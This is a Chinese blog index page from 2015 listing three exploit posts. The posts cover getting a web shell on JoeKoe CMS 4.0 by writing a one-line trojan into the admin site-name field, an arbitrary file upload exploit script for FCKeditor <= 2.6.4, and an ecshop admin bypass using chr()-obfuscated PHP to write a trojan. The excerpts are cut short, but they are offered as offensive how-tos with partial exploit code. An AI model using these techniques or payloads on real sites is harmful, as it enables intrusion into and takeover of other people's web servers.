2015年9月28日
乔客(joekoe) CMS 4.0 上传及后台拿shell
摘要: 上传漏洞:看/common/include/web.upload.asp 中的代码 乔客(JoeKoe) CMS 4.0后台拿shell。来到后台—>系统管理—>网站配置—>网站名称—>在网站名称那里写入一句话。 然后通过一句话链接器连接. www.XXX.com/index.asp 即可! 阅读全文
posted @ 2015-09-28 11:40 小生观察室 阅读(246) 评论(0) 推荐(0) 编辑
fckeditor <= 2.6.4 任意文件上传漏洞
摘要: fckeditor <= 2.6.4 任意文件上传漏洞, php coldfunsion应该KO了,asp表示很淡定,其他语言版本未测 <? error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); de 阅读全文
posted @ 2015-09-28 10:51 小生观察室 阅读(3588) 评论(0) 推荐(0) 编辑
ecshop后台获取shell,通杀最新版本&后台低权限(2011)
摘要: 后台可以提交构造代码绕过过滤,成功解析生成一句话木马. <?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60 阅读全文
posted @ 2015-09-28 10:07 小生观察室 阅读(89) 评论(0) 推荐(0) 编辑